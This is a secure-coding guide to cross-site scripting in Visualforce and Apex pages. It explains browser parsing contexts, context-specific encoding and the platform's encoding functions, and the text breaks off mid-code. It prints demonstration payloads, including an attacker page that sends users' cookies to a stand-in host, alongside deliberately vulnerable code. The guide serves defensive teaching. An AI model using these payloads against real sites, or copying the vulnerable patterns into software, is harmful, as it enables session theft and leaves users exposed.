Secure Coding Cross Site Scripting
What is it?
Cross-site scripting is a vulnerability that occurs when an attacker can insert unauthorized JavaScript, VBScript, HTML, or other active content into a web page viewed by other users. A malicious script inserted into a page in this manner can hijack the user’s session, submit unauthorized transactions as the user, steal confidential information, or simply deface the page. Cross-site scripting is one of the most serious and most common attacks against web applications today.
XSS allows malicious users to control the content and code on your site, something only you should be able to do.
Sample vulnerability
Consider a web application with a search feature. The user sends their query as a GET parameter, and the page echoes the parameter back:
Request: https://example.com/api/search?q=apples
Response: “You searched for apples”
<apex:page>
<!-- Vulnerable Page at https://example.com/api/search -->
<div id='greet'></div>
<script>
document.querySelector('#greet').innerHTML='You searched for <b>{!$CurrentPage.parameters.q}</b>';
</script>
</apex:page>
An attacker can lure the user to a page such as the following:
<html>
<!-- Evil Page -->
<body>
<h1>Ten Ways to Pay Down Your Mortgage</h1>
<iframe id='attack' style='visibility:hidden'></iframe>
<script>
var payload = "\x3csvg onload=\x27document.location.href=\x22http://cybervillians.com?session=\x22+document.cookie\x27\x3e";
document.querySelector('#attack').src = "https://example.com/api/search?q=" +
encodeURIComponent(payload);
</script>
</body>
</html>
The user’s browser will load the iframe by requesting https://example.com/api/search?q=<svg .....>.
<html>
<!-- Response From Server -->
<div id='greet'></div>
<script>
document.querySelector('#greet').innerHTML = 'You searched for <b>\x3csvg onload=\x27document.location.href=\x22http://cybervillians.com?session=\x22+document.cookie\x27\x3e</b>';
</script>
</html>
The script then writes the following into the DOM:
<div id='greet'>
You searched for
<b>
<svg onload='document.location.href="http://cybervillians.com?session=" + document.cookie'>
</b>
</div>
Once the DOM is rendered, the browser will navigate the page to cybervillians.com and will also send the user's example.com cookies there. It will be as if example.com developers had written their page that way. However, there is essentially no limit to the payloads the attacker could have provided. Anything example.com developers can do with HTML and JavaScript, the attacker can also do.
Overview of browser parsing
Cross-site scripting occurs when browsers interpret attacker-controlled data as code. To develop your application securely, you therefore need to understand how browsers distinguish between data and code.
User data can be, and often is, processed by several different parsers in sequence, with different decoding and tokenization rules applied by each parser. The sample vulnerability highlights three parsing stages:
Three Parsing Stages and Three Attacks
The merge-field {!$CurrentPage.parameters.q} is first passed to the HTML parser as it is processing the contents of a <script> tag. In this context, the parser is looking for the closing tag, </script>, to determine the extent of the script data that should be passed to the JavaScript engine.
<script>
document.querySelector('#greet').innerHTML='You searched for <b>"{!$CurrentPage.parameters.q}"</b>';
</script>
If the attacker sets the URL parameter:
q=</script><script> ..attacker code here.. </script>
the HTML parser determines that the original script block has ended, and an attacker-controlled script block is sent as a second script to the JavaScript engine.
Next, when the script block is sent to the JavaScript parser, the attacker can try to break out of the JavaScript string declaration:
document.querySelector('#greet').innerHTML='You searched for <b>"{!$CurrentPage.parameters.q}"</b>';
For example, by setting the URL parameter to be:
q='; ....attacker code here..;//'
Finally, the JavaScript parser invokes an innerHTML write, passing a string back to the HTML parser for DOM rendering. Here the attacker can inject another payload containing an HTML tag with a JavaScript event handler. Because the string passed to innerHTML is defined in a JavaScript context, the control characters do not need to be < or >, but can be represented as '\x3c' and '\x3e'. These will be interpreted by the JavaScript engine as brackets to be written into the DOM. This is the original sample attack.
Therefore the sample code has three different parsing stages which allow for three different attacks, triggered by the insertion of three different control characters:
- > (as part of a closing </script> tag) can be used to break out of the original script block
- ' can be used to break out of the javascript string declaration
- \x3c or \u003c or < can be used to inject a new tag via innerHTML.
Other constructions have other parsing stages and potential attacks -- the list of potentially dangerous characters is dependent on the sequence of parsers applied to user data.
Rather than trying to learn all possible dangerous characters, the developer should learn to identify the sequence of browser parsing passes and apply the corresponding sequence of escaping functions. This will ensure that user data renders properly as text and cannot escape into an execution context.
HTML Parsing and Encoding
When an HTML document is loaded or when JavaScript calls an HTML rendering function, the string is processed by the HTML parser.
HTML tags follow the general structure:
<tagname attrib1 attrib2='attrib2val' attrib3="attrib3val">textvalue</tagname>
Only attribute values and the textvalue of a node are considered data for the HTML parser. All other tokens are considered markup.
There are two main mechanisms of injecting JavaScript into HTML:
- Directly, as a script tag or another HTML tag that supports a JavaScript event handler
- By breaking out of a quoted attribute value and creating an attribute that is a JavaScript event handler
<div>[userinput]</div> <!-- userinput = <script>alert(1)</script> -->
<div>[userinput]</div> <!-- userinput = <svg onload='payload'> -->
<div title='[userinput]'> <!-- userinput = ' onmouseover='payload' ' -->
Because of this, user input within an html context needs to be prevented from breaking out of a quoted context or from injecting html tags. This is done with HTML encoding.
HTML Encoding
In order to force a string character to be interpreted as data rather than markup, a character reference should be used. There are two common ways to denote a character reference:
- Numeric character references represent the character by an ampersand (&), then the pound sign (#), followed by either the decimal Unicode code point value or an "x" and the hexadecimal Unicode value. Finally, a semicolon (;) closes out the character reference. This allows every Unicode character to be referenced.
- Entity character references represent a subset of commonly used special characters by an ampersand (&), an ASCII mnemonic for the character's name, and an (optional) closing semicolon.
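To make the numeric form concrete, here is a small sketch that builds both numeric character references for a character. The function name numericReferences is hypothetical. It uses codePointAt so that characters outside the Basic Multilingual Plane yield a single reference rather than two surrogate halves.

```javascript
// Build the decimal and hexadecimal numeric character references for the
// first code point of a string.
function numericReferences(ch) {
  var cp = ch.codePointAt(0);
  return {
    decimal: "&#" + cp + ";",
    hex: "&#x" + cp.toString(16) + ";"
  };
}

console.log(numericReferences("<"));         // { decimal: '&#60;', hex: '&#x3c;' }
console.log(numericReferences("\u{1F600}")); // { decimal: '&#128512;', hex: '&#x1f600;' }
```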
HTML encoding is the process of replacing characters by their character references, and HTML decoding is the reverse.
<html>
<body>
<div id="link1">
&lt;a href="www.salesforce.com">link</a> <!-- Not interpreted as a tag but as text -->
</div>
<div id="link2">
<&#97; href="www.salesforce.com">link</a> <!-- Not interpreted as an anchor tag -->
</div>
<div id="link3">
<a &#104;ref="www.salesforce.com">link</a> <!-- link without anchor -->
</div>
<div id="link4">
<a href="&#119;&#119;&#119;&#46;&#115;&#97;&#108;&#101;&#115;force.com">link</a> <!-- works fine. -->
</div>
</body>
</html>
The HTML parser generates the following DOM:
<body>
<div id="link1"> <a href="www.salesforce.com">link </div>
<div id="link2"> <a href="www.salesforce.com">link </div>
<div id="link3"> <a &#104;ref="www.salesforce.com">link</a> </div>
<div id="link4"> <a href="www.salesforce.com">link</a> </div>
</body>
which the browser renders as:
<a href="www.salesforce.com">link
<a href="www.salesforce.com">link
link
link
- For link1, because the bracket is replaced by its character reference, the less-than sign is treated as a string literal. The closing tag </a> is viewed as a redundant closing tag and is not rendered in the DOM at all.
- In link2, an escaped character immediately follows the opening bracket, but the HTML parser is expecting a tag name, which is markup. As this is impossible, the HTML parser bails on tag processing and interprets the opening tag as text. The closing tag is swallowed as in link1.
- In link3, the anchor tag is successfully parsed, but as the "h" in "href" is escaped, the href is not interpreted as an attribute. The result is an anchor tag without an href: the link text appears but is not clickable.
- In link4, because only a portion of an attribute value is encoded, the character references are decoded to "www.sales" in the DOM and the link is clickable, successfully navigating to www.salesforce.com.
Therefore, if developers HTML encode user data prior to HTML rendering, the data will always render as text and never as markup. In general, only a subset of characters are HTML encoded: those characters that can allow an attacker to inject their own tags or break out of a quoted attribute value:
| Common Name | Symbol | Decimal Numeric | Hex Numeric | Entity |
|---|---|---|---|---|
| Ampersand | & | &#38; | &#x26; | &amp; |
| Less than Symbol | < | &#60; | &#x3c; | &lt; |
| Greater than Symbol | > | &#62; | &#x3e; | &gt; |
| Single Quote | ' | &#39; | &#x27; | N/A |
| Double Quote | " | &#34; | &#x22; | &quot; |
When using unquoted attribute values or when failing to close tags, other characters need to be escaped. However, in this case the set of characters that would need to be escaped is browser dependent and may change with new browser versions. Developers should ensure that all HTML tags are balanced and that all attribute values are quoted. User data within an HTML context should only appear as the text content of an existing tag or within a quoted attribute value.
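A minimal sketch of an HTML encoder covering the five characters above might look like the following. The names HTML_ENTITIES and htmlEncode are illustrative, not a platform API, and the sketch assumes its output is only ever placed in text content or a quoted attribute value.

```javascript
// Map each HTML control character to a character reference.
// The single quote has no entity name that is safe everywhere, so the
// decimal numeric reference is used for it.
var HTML_ENTITIES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  "'": "&#39;",
  '"': "&quot;"
};

function htmlEncode(value) {
  return String(value).replace(/[&<>'"]/g, function (c) {
    return HTML_ENTITIES[c];
  });
}

console.log(htmlEncode("<svg onload='alert(1)'>"));
// &lt;svg onload=&#39;alert(1)&#39;&gt;
console.log(htmlEncode('Tom & "Jerry"'));
// Tom &amp; &quot;Jerry&quot;
```

The ampersand is in the replaced set as well, so text that already looks like a character reference is shown literally instead of being decoded.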
HTML Parsing Contexts
The HTML parser operates in several contexts, the most important of which are the normal, raw text, and escapable raw text contexts.
PCDATA or Normal Context Parsing
For most tags the PCDATA (in HTML 4), or normal (in HTML 5) parsing context applies. In this context the HTML parser tries to balance nested tags and performs HTML decoding prior to DOM rendering.
For example, the HTML parser converts:
<div id="alpha"><span class="</div>">in alpha.</span> Still in alpha</div>
<div id="beta">in beta</span></div>
into the following DOM:
<div id="alpha">
<span class="</div>">in alpha.</span>
" Still in alpha"
</div>
<div id="beta">in beta</div>
For PCDATA parsing, keep in mind that:
- Because tags and attribute values are balanced, the parser will not allow data within an attribute value to inject a new tag or close out an existing tag, as per the example above. The only way to escape a quoted attribute value is to close out the quote OR enter a CDATA context.
- All character references are decoded, and are therefore unsafe to be used as inputs into further HTML rendering contexts without applying an additional round of encoding.
Raw Text or CDATA Parsing
For <script> and <style> tags the CDATA (HTML 4) or raw text (HTML 5) context applies. In this mode, the parser searches for the closing script or style tag, and dispatches the contents of the string between these tags to the javascript or CSS parser. No HTML decoding occurs. This is because the HTML parser does not understand javascript or CSS; its parsing role is limited to determining the length of the string to pass to the JS or CSS parser.
The following code:
<html>
<head>
<meta charset="utf-8">
<title>JS Bin</title>
</head>
<body>
<script>
console.log('in alpha</script><script>console.log("not in alpha");</script>');
</script>
</body>
</html>
sends two scripts to the JavaScript engine, resulting in:
> SyntaxError: Unexpected token ILLEGAL
> not in alpha
Another example:
<html>
<head>
</head>
<body>
<div id='xyz' onclick='console.log("&#100;ecoded")'>Click me!</div>
<div id='baa'>Click me!</div>
<div id='baz'>Click me!</div>
<script>
document.querySelector('#baa').onclick = function() {
  console.log("&#100;ecoded");
  return true;
}
document.querySelector('#baz').onclick = function() {
  console.log("Howdy!</script><script>alert(1)</script>");
  return true;
}
</script>
</body>
</html>
Clicking on the first div logs decoded, whereas clicking on the second logs &#100;ecoded, and clicking on the third div pops an alert box.
CDATA-style processing presents a number of potential pitfalls:
- Refactoring issues: If a developer first defines the event handler inline and then refactors to register event handlers within a script tag, she will need to ensure that one fewer HTML-encode operation occurs, otherwise data will be over-encoded. Similarly, a refactoring away from separate registration towards inline definition can lead to under-encoding. In both cases the resulting page is broken. However, alphanumeric characters will continue to render properly, even as a "<" is rendered as "&lt;" in the over-encoding case or interpreted as markup in the under-encoding case.
- JS string escapes: As per the example, if an attacker can inject brackets into a javascript string context, they may be able to break out of the string by breaking out of the parent script context entirely. This effectively makes brackets javascript control characters.
- Complex parsing rules with comments: The combination of html-style comment tags with <script> or <style> tags can lead to confusing or unexpected behavior. We will not detail these parsing rules here, but developers should not nest <script> tags within each other or place html comments <!-- on the same line as <script> tags.
Escapable Raw Text Parsing
For <textarea> and <title> tags, escapable raw text parsing is used. Here the parser looks for the closing </textarea> or </title> tag and does not allow the creation of any new tags. Nevertheless, character references are decoded.
In this context keep the following in mind:
- Do not assume that user data cannot break out of this context -- data can break out by closing the title or textarea tag.
- When using this context to store HTML micro templates, do not allow user input to write to this context without HTML encoding
Javascript Parser
A JavaScript parser tokenizes JavaScript code for execution by the browser's JavaScript engine. JavaScript code can generate new HTML code (e.g. document.write(), element.innerHTML=x) and can also skip the HTML parser and update the DOM directly (e.g. document.createElement(), element.title=x, document.body.appendChild()). JavaScript code can also update element styles via the CSS Object Model (CSSOM).
Javascript has several encoding formats:
- C-style backslash \ encoding of special characters within string literals
- Two-digit hex encoding of the corresponding code point: \xNN
- Three-digit octal encoding of the corresponding code point: \NNN
- Four-digit hex encoding of a UTF-16 code unit: \uNNNN. Surrogate pairs are handled by placing two such references next to each other: \uAAAA\uBBBB
The following table shows the typical behavior of a JavaScript encoder:
| Common Name | Symbol | Common JS Encoding |
|---|---|---|
| Single Quote | ' | \' |
| Double Quote | " | \" |
| Backslash | \ | \\ |
| Carriage Return | N/A | \r |
| New Line | N/A | \n |
| Less than Symbol | < | \x3c |
| Greater than Symbol | > | \x3e |
JavaScript encoding is not nearly as powerful as HTML encoding. Object names (variables, functions, arrays) can be encoded in JavaScript and still be callable, so merely encoding something does not mark it as data rather than code. Instead, JavaScript encoding is used to prevent user data from breaking out of a quoted string context, by escaping the characters that would close out a string (single and double quotes, as well as new lines). Additionally, because of CDATA parsing, a closing script tag can also break out of a string (by breaking out of the enclosing script).
Note that if user controlled data is placed into a javascript context without being quoted, then nothing can prevent XSS. All user data in javascript should be quoted AND encoded.
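The encoder behavior in the table can be sketched roughly as follows. The names JS_ESCAPES and jsEncode are hypothetical. The two Unicode line separators are an added assumption beyond the table, included because older JavaScript engines treat them as line terminators inside string literals. The output is meant only for use inside a quoted string.

```javascript
// Escape sequences for characters that can close a quoted string, start an
// escape sequence, or (via </script>) close the enclosing script block.
var JS_ESCAPES = {
  "'": "\\'",
  '"': '\\"',
  "\\": "\\\\",
  "\r": "\\r",
  "\n": "\\n",
  "<": "\\x3c",
  ">": "\\x3e",
  "\u2028": "\\u2028", // assumption: not in the table above
  "\u2029": "\\u2029"  // assumption: not in the table above
};

function jsEncode(value) {
  return String(value).replace(/[\\'"<>\r\n\u2028\u2029]/g, function (c) {
    return JS_ESCAPES[c];
  });
}

console.log(jsEncode("'; alert(1); //")); // \'; alert(1); //
console.log(jsEncode("</script>"));       // \x3c/script\x3e
```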
Be aware that JavaScript decoding occurs whenever strings are evaluated as code, such as with eval, setInterval, or Function. In that case you will need to additionally JS encode user data for each implicit eval performed. Because of this, it is recommended that you do not apply evals to code containing user data.
JavaScript can invoke the HTML parser by means of one of the built-in HTML rendering methods:
HTML Rendering Methods
- document.write
- document.writeln
- element.innerHTML
- element.outerHTML
- element.insertAdjacentHTML
If you are using jQuery, the following are common DOM manipulation methods that invoke the HTML parser in their implementation (cf. the DOM XSS Wiki):
Common jQuery HTML Rendering Methods
- .add()
- .append()
- .before()
- .after()
- .html()
- .prepend()
- .replaceWith()
- .wrap()
- .wrapAll()
If you are using a different toolkit or higher-order JavaScript framework, you will need to know whether the methods you call invoke the HTML decoder or not; otherwise you risk over- or under-encoding data.
<html>
<head>
<script src='/jquery.js'></script>
</head>
<body>
<div id='xyz'></div>
<script>
// payload
var payload = "<svg onload='alert(1)'>";
var html_encoded_payload = "&lt;svg onload=&#39;alert(1)&#39;&gt;";
// Whether it is safe to pass the payload to a DOM modification function
// depends on whether the function invokes the HTML parser.
var el = document.querySelector('#xyz');
el.innerHTML = payload; //vulnerable
el.innerHTML = html_encoded_payload; //safe and correct
el.innerText = payload; //safe
el.innerText = html_encoded_payload; //safe but double encoded
// When using a library such as jQuery, familiarize yourself with whether
// methods perform HTML rendering and encode appropriately.
$('#xyz').append(payload); //vulnerable
$('#xyz').append(html_encoded_payload); //safe and correct
$('#xyz').text(payload); //safe
$('#xyz').text(html_encoded_payload); //safe but double encoded
</script>
</body>
</html>
URI Parser
The URI parser tokenizes URIs into the following components:
scheme://login:password@address:port/path?query_string#fragment
Control characters for the URI parser are the full ASCII scheme name, the scheme delimiter ":", and "@", ".", "?", "/", and "#". Data for the URI parser are the two credentials, the address, path, query string, and fragment content.
When, for example, a path needs to contain a question mark that should not be interpreted as a control character, URI encoding is used: %3f. URI encoding is defined in RFC 3986 and consists of a % sign followed by the two-digit hexadecimal value of the byte.
For security encoding, be aware that browsers support multiple pseudo-schemes, the most important of which is the javascript pseudo scheme: javascript:..payload..
If the scheme or scheme delimiter (:) is URI encoded, it will not be interpreted as a scheme. Similarly, if a "/" is URI encoded, it will not be interpreted as a path delimiter. Therefore, URI encoding a string and setting it to be an href will cause the browser to interpret the entire string as a relative path with no URL parameters and no fragments.
<html>
<body>
<a id='xyz'>Click me!</a>
<script>
var el = document.querySelector('#xyz');
el.href='javascript:alert(1)' //executes
el.href='javascript:\x61lert(1)' //js encode 'a' in alert. executes
el.href='javascript\x3aalert(1)' //js encode ':' in scheme. executes.
el.href='javascript%3aalert(1)' //URI encode ':' in scheme. does not execute
el.href="javascript&#58;alert(1)"; //HTML encode ':' in scheme. does not execute
el.outerHTML = '\x3ca href=\x22javascript:alert(1)\x22\x3eClick me!\x3c/a\x3e'; //executes
</script>
</body>
</html>
Because URI encoding maps characters to %XX, which are not HTML, JS, or CSS control characters, we can skip any additional encodings that would need to occur after URI encoding, but we cannot skip encodings that are required before URI encoding:
<html>
<body>
<!-- Vulnerable to XSS -->
<a id='xyz'>Click me!</a>
<a id='abc'>Click me!</a>
<script>
var xyz = document.querySelector('#xyz');
var payload = "javascript:alert(1)";
xyz.href="javascript:\x22this.element.innerHTML=\x22" + payload + "\x22"; //vulnerable
</script>
</body>
</html>
In the above, payload will be sent to a URI parser (in the href definition) and then to the HTML parser. Therefore, properly encoding the payload requires both encodings: URIENCODE(HTMLENCODE(payload)).
If, for example, the payload is only HTMLENCODED, then %3c will be URI decoded into a bracket. If the payload is only URIENCODED, then a payload of "<" can be injected directly.
As URI encoding is only defined on byte values 0-255, higher code points are first transformed into a sequence of UTF-8 bytes, and then each byte is URI encoded.
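The byte-by-byte process can be sketched as follows. The function name percentEncodeUtf8 is hypothetical, and the sketch deliberately encodes every byte, including safe ASCII letters, to keep the mechanics visible. TextEncoder is assumed to be available, as it is in current browsers and Node.js.

```javascript
// Percent-encode every UTF-8 byte of a string.
function percentEncodeUtf8(text) {
  var bytes = new TextEncoder().encode(text); // UTF-8 byte sequence
  return Array.from(bytes, function (b) {
    return "%" + b.toString(16).toUpperCase().padStart(2, "0");
  }).join("");
}

console.log(percentEncodeUtf8("\u00e9"));  // %C3%A9      (U+00E9, two UTF-8 bytes)
console.log(percentEncodeUtf8("\u20ac"));  // %E2%82%AC   (U+20AC, three UTF-8 bytes)
console.log(encodeURIComponent("\u00e9")); // %C3%A9      (same bytes from the built-in)
```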
Be aware that JavaScript contains three pairs of built-in URI encoding and decoding functions, none of which are suitable for security encoding:
- escape(), unescape() have been deprecated because of improper UTF-8 handling.
- encodeURI() and decodeURI() are designed to allow URIs with some illegal characters to be converted to legal URIs. These functions do not encode URI control characters such as "://" or ".".
- encodeURIComponent() and decodeURIComponent() are designed to encode all URI control characters but do not encode all characters such as the single quote.
For guidance as to which functions to use, see the specific section guidance.
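As an illustration of the gap in encodeURIComponent() noted above, the sketch below wraps it so that the characters it leaves alone (! ' ( ) *) are also percent-encoded. The name strictEncodeURIComponent is hypothetical, and this is a commonly used workaround rather than the specific guidance this document refers to.

```javascript
// Percent-encode the characters that encodeURIComponent leaves untouched
// but that can act as control characters in other contexts (e.g. the
// single quote inside a quoted JavaScript string or HTML attribute).
function strictEncodeURIComponent(value) {
  return encodeURIComponent(value).replace(/[!'()*]/g, function (c) {
    return "%" + c.charCodeAt(0).toString(16).toUpperCase();
  });
}

console.log(encodeURIComponent("it's"));          // it's
console.log(strictEncodeURIComponent("it's"));    // it%27s
console.log(strictEncodeURIComponent("a/b?c=d")); // a%2Fb%3Fc%3Dd
```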
CSS Parser
CSS parsers have their own encoding format. CSS encoding consists of a backslash followed by up to 6 hexadecimal digits corresponding to the Unicode (ISO 10646) code point. As the number of digits is variable, a trailing space is required to close out the character reference if fewer than 6 digits are used, and in this case the space is consumed by the CSS parser.
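The encoding format described above can be sketched as follows. The name cssEncode is hypothetical. The sketch always emits the trailing space, which the CSS parser consumes, so that a following hex digit in the data is never absorbed into the escape. It is only meaningful for data placed inside a quoted CSS string.

```javascript
// Encode every non-alphanumeric character as a backslash, the hex code
// point, and a terminating space.
function cssEncode(value) {
  return Array.from(String(value), function (ch) {
    if (/^[A-Za-z0-9]$/.test(ch)) {
      return ch;
    }
    return "\\" + ch.codePointAt(0).toString(16) + " ";
  }).join("");
}

console.log(cssEncode("a<b")); // a\3c b
console.log(cssEncode("x'y")); // x\27 y
```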
As with Javascript encoding, merely encoding a string does not force the CSS parser to treat it as data rather than markup -- the encoding is only useful to prevent user data from breaking out of a quoted string declaration. Unfortunately, many CSS property values are not quoted, in which case it is impossible to safely encode the value. In this case, strict use of an allowlist (which provides a list of allowed values and prevents the use of anything unlisted) is required to ensure that only the expected characters are present in the string.
There are several ways that the CSS parser can invoke the URI parser (for example by referencing an image URL or a style sheet URL), but invocation of JavaScript from CSS is limited to browser-specific features such as moz-bindings or older browser features (such as expression or javascript pseudo-schemes). Nevertheless, as Salesforce supports these older browsers, it's critical to apply an allowlist (a list of all acceptable values) to user data whenever it is passed to the CSS interpreter.
When CSS is invoked from javascript, for example with element.style="x", it is first interpreted by the javascript parser and then by the CSS parser. In such cases, javascript control characters should be escaped. If they aren't, they could be used to bypass the allowlist filter. For this reason, filtering against the allowlist should be done as close to the sink as possible.
General References
Specific Guidance
Apex and Visualforce Applications
The platform provides two main mechanisms to avoid cross site scripting: auto HTML encoding as well as built in encoding functions that can be invoked manually from VisualForce. Nevertheless in order to use these protections correctly, the developer needs to have a thorough understanding of how user controlled variables are rendered by the browser.
There is no 'easy' button with cross site scripting defenses. Developers must understand the sequence of rendering contexts into which they place user data, and encode appropriately for each context.
Built in Auto Encoding
All merge-fields are always auto HTML encoded provided they
- do not occur within a <style> or <script> tag
- do not occur within an apex tag with the escape='false' attribute
The auto HTML encoding performed is applied last (after any other VisualForce functions) and is applied regardless of whether you use any other VisualForce encoding functions. It does not matter whether the merge-field is rendered via an explicit apex tag or directly using the braces notation within HTML markup. Your application code needs to take auto-encoding into account in order to avoid double encoding or improperly encoding merge-fields.
<apex:outputText>
{!$CurrentPage.parameters.userInput} <!-- safe (auto HTML Encoded) -->
</apex:outputText>

<div>
{!$CurrentPage.parameters.userInput} <!-- safe (auto HTML Encoded) -->
</div>

<script>
var x = '{!$CurrentPage.parameters.userInput}'; //vulnerable to XSS
</script>

<style>
.xyz {
color: #{!$CurrentPage.parameters.userInput}; /* vulnerable to XSS */
}
</style>
The auto encoding only provides HTML encoding of <, >, and quotes within HTML attributes. You must perform your own JavaScript and URL encoding as well as handle CSS cross-site scripting issues.
<!-- vulnerable to XSS -->
<div onclick = "console.log('{!$CurrentPage.parameters.userInput}')">Click me!</div>
In the above code fragment, userInput is rendered within a JavaScript execution context embedded within an HTML context, and so the auto HTML encoding is insufficient. For these and other use cases, the platform provides VisualForce encoding functions that can be chained together to provide sufficient encoding in multiple contexts.
Unsafe sObject Data Types
| Primitive Type | Restrictions on Values |
|---|---|
| url | Can contain arbitrary text. The platform will prepend the url with 'http://' if no scheme is provided. |
| picklist | Can contain arbitrary text, independent of the field definition. Picklist values are not enforced by the schema, and users can modify a picklist value to contain any text via an update call. |
| text | Can contain arbitrary text |
| textarea | Can contain arbitrary text |
| rich text field | Contains an allowlist of HTML tags. Any other HTML characters must be HTML-encoded. The listed tags can be safely used unencoded in an HTML rendering context but not in any other rendering context (e.g. JavaScript control characters are not encoded). |
Name fields can be arbitrary text and must be considered unsafe. This also applies to global variables such as usernames.
Developers are urged to program defensively. Even if a primitive type (such as an Id) cannot contain control characters, properly output encode the field type based on the rendering context. For such types, output encoding will never result in over-encoding and will make your application safe for further refactoring should the controller logic change -- for example, by pulling the Id from a URL parameter rather than from the controller.
Built in VisualForce encoding functions
The platform provides the following VisualForce encoding functions:
- JSENCODE -- performs string encoding within a Javascript String context.
- HTMLENCODE -- encodes all characters with the appropriate HTML character references so as to avoid interpretation of characters as markup.
- URLENCODE -- performs URI encoding (% style encoding) within a URL component context.
- JSINHTMLENCODE -- a convenience method that is equivalent to the composition of HTMLENCODE(JSENCODE(x))
Data may need to be encoded multiple times if it passes through multiple parsers.
JSENCODE
<script>
var x = '{!JSENCODE($CurrentPage.parameters.userInput)}'; //safe
</script>
Without JSENCODE, an attacker could break out of the string declaration by setting:
userInput='; alert(1); //
at which point the attacker's code would execute.
<!-- safe -->
<div onclick = "console.log('{!JSENCODE($CurrentPage.parameters.userInput)}')">Click me!</div>
Because the parsing flow is HTML Parser -> JS Parser, the merge-field must be properly encoded as: HTMLENCODE(JSENCODE(x)). As we know that the platform will HTML auto-encode last, it is enough to explicitly invoke the inner encoding, JSENCODE.
What if the merge-field is not typed as a string? One option is to leave the merge-field naked. However, this is a dangerous anti-pattern because it creates a dependency between the implementation details in the controller and the security of the Visualforce page. Suppose, for example, that in the future the controller pulls this value from a URL parameter or text field. Now the Visualforce page is vulnerable to cross-site scripting. The security of the Visualforce page should be decoupled as much as possible from the controller implementation. A safer option is to quote and encode the merge-field and then convert it to the expected type in JavaScript:
<script>
var myint = parseInt("{!JSENCODE(int_data)}"); //now we are sure that myint is an int
var myfloat = parseFloat("{!JSENCODE(float_data)}"); //now we are sure that myfloat is a float
var mybool = {!IF(bool_data, "true", "false")}; //now we are sure that mybool is a boolean
var myJSON = JSON.parse("{!JSENCODE(stringified_value)}"); //when transmitting stringified JSON
</script>
This way a subtle change in the controller implementation (for example, pulling the value from a URL parameter or text field) will not trigger a security vulnerability in the corresponding VisualForce page.
HTMLENCODE
HTMLENCODE is required when user data is interpreted in an HTML context and is not already auto-encoded.
<apex:outputText escape="false" value="<i>Hello {!HTMLENCODE(Account.Name)}</i>" />
In the above, because Name fields can be arbitrary text strings, any rendering of this field needs to be properly output encoded. Because we want to combine markup (italics) with data, the apex tag is set to escape="false" and we manually encode user data.
<div id="xyz"></div>
<script>
document.querySelector('#xyz').innerHTML='Howdy ' + '{!JSENCODE(HTMLENCODE(Account.Name))}';
</script>
In the above, the merge-field first passes through the HTML parser when the page is loaded, but because the merge-field is within a script tag, the HTML parser does not perform character reference substitution and instead passes the contents of the script block to the JavaScript parser. JavaScript code then calls innerHTML, which performs HTML parsing (and character reference substitution). Therefore the parsing is JavaScript -> HTML, and the necessary encoding is JSENCODE(HTMLENCODE()). Note that only performing JSENCODE or only performing HTMLENCODE will lead to a broken page and possibly a cross-site scripting vulnerability.
<!-- vulnerable to XSS -->
<div onclick="this.innerHTML='Howdy {!Account.Name}'">Click me!</div>

<!-- safe -->
<div onclick="this.innerHTML='Howdy {!JSENCODE(HTMLENCODE(Account.Name))}'">Click me!</div>

<!-- vulnerable to XSS -->
<div onclick="this.innerHTML='\x3cdiv onclick=\x22console.log(\x27Howdy {!Account.Name}\x27);\x22\x3eClick me again!\x3c/div\x3e'">Click me!</div>

<!-- safe -->
<div onclick="this.innerHTML='\x3cdiv onclick=\x22console.log(\x27Howdy {!JSENCODE(HTMLENCODE(JSENCODE(Account.Name)))}\x27);\x22\x3eClick me again!\x3c/div\x3e'">Click me!</div>
URLENCODE
<!-- Safe -->
<img src="/xyz?name={!URLENCODE(Pic.name)}">{!Pic.Name}</img>

<script>
// Safe, but anti-pattern
var x = '{!URLENCODE(Pic.name)}';
var el = document.querySelector('#xyz');
el.outerHTML = '<img src = "/pics?name=' + x + '">';
</script>

<script>
// Safe, and no use of HTML rendering
var x = '{!URLENCODE(Pic.name)}';
var el = document.querySelector('#xyz');
el.src = '/pics?name=' + x;
</script>
One thing to keep in mind about URLs is that all browsers will accept a javascript pseudo-scheme for location URLs, while older browsers will also accept a javascript pseudo-scheme for src attributes or url attributes within CSS. Therefore you must control the scheme as well as the host and only allow user input to set URL parameters or paths. In those cases when users select the host, you must create an allowlist of acceptable hosts and validate against it to avoid arbitrary redirect vulnerabilities.
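A scheme and host check along these lines might be sketched as follows. The names ALLOWED_SCHEMES, ALLOWED_HOSTS, and isAllowedUrl are hypothetical, and the host list is a placeholder. The sketch relies on the standard URL constructor, which normalizes the scheme to lowercase and throws on strings that are not absolute URLs.

```javascript
// Hypothetical allowlists: adjust to the schemes and hosts your
// application actually needs.
var ALLOWED_SCHEMES = ["https:"];
var ALLOWED_HOSTS = ["example.com", "www.example.com"];

function isAllowedUrl(candidate) {
  var url;
  try {
    url = new URL(candidate); // throws for relative or malformed input
  } catch (e) {
    return false;
  }
  return ALLOWED_SCHEMES.indexOf(url.protocol) !== -1 &&
         ALLOWED_HOSTS.indexOf(url.hostname) !== -1;
}

console.log(isAllowedUrl("https://example.com/pics?name=a")); // true
console.log(isAllowedUrl("JavaScript:alert(1)"));             // false
console.log(isAllowedUrl("https://evil.example.net/"));       // false
console.log(isAllowedUrl("/relative/path"));                  // false
```

Rejecting relative input is a design choice of this sketch. An application that accepts relative paths would instead resolve them against a known base URL before checking.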
JSINHTMLENCODE
<!-- safe, but broken due to double html encoding -->
<div onclick="console.log('{!JSINHTMLENCODE(Account.Name)}')">Click me!</div>

<!-- safe and accurate -->
<div onclick="console.log('{!JSENCODE(Account.Name)}')">Click me!</div>

<script>
var el = document.querySelector('#xyz');
el.innerHTML = "Howdy {!JSINHTMLENCODE(Account.Name)}"; //safe and accurate
</script>
XSS in CSS
<style>
<!-- vulnerable to XSS unless verified with an allowlist in the controller-->
foo {
color: #{!color};
}
</style>
<script>
var el = document.querySelector('#xyz');
var color = '{!JSENCODE(color)}'; //must JSENCODE to prevent breaking out of string
if ( /(^[0-9a-f]{6}$)|(^[0-9a-f]{3}$)/i.test(color) ) {
el.style.color='#' + color; //safe to render into a style context
}
</script>
Client-side encoding and API interfaces
Many applications pull data via API callouts executed in JavaScript, and then render the data in the DOM with JavaScript or a JavaScript-based toolkit. In this case, the Visualforce encoding functions cannot be used to encode the data, but the data must still be encoded for the appropriate rendering context. Note that the platform performs no automatic HTML encoding when the DOM is rendered client-side, so a simple refactoring from server-side rendering with Visualforce merge-fields to client-side rendering with JavaScript may create multiple XSS vulnerabilities.
//vulnerable code
cometd.subscribe('/topic/xyz', function(message) {
var data = document.createElement('li');
